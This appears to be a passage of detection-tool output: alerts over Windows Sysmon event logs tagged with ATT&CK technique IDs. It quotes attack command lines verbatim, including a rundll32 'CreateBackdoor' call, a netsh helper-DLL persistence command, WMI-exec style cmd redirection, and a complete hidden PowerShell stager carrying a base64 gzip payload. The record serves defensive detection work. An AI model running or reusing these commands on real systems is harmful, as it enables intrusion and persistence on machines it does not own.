0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578497 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:32:55.351 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-0433-607F-0000-002073600700 + 0x76073 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1608044415.695478,2020-12-15T19:00:15.695478+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 135 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 589974 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-15 15:00:14.467 + 747F3D96-CF4B-5FD8-0000-00101AD58700 + 6976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10 + 50007 + + false + 10.0.2.17 + MSEDGEWIN10CLONE + 135 + epmap + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.543692,2019-07-30T01:33:58.543692+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh.exe add helper AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4947 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.336 + 747F3D96-6646-5D3F-0000-001051388B00 + 3824 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh.exe add helper AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.720846,2020-10-18T02:53:05.720846+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421225 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.675 + 747F3D96-75D1-5F8B-0000-001061BD3300 + 4864 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1556656012.356089,2019-05-01T00:26:52.356089+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle, -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9808 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:51.965 + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-00101C1A1900 + 3348 + C:\Windows\System32\cmd.exe + C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.485479,2019-07-30T01:33:58.485479+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh trace show status ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4946 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.273 + 747F3D96-6646-5D3F-0000-0010A7318B00 + 4148 + C:\Windows\System32\cmd.exe + 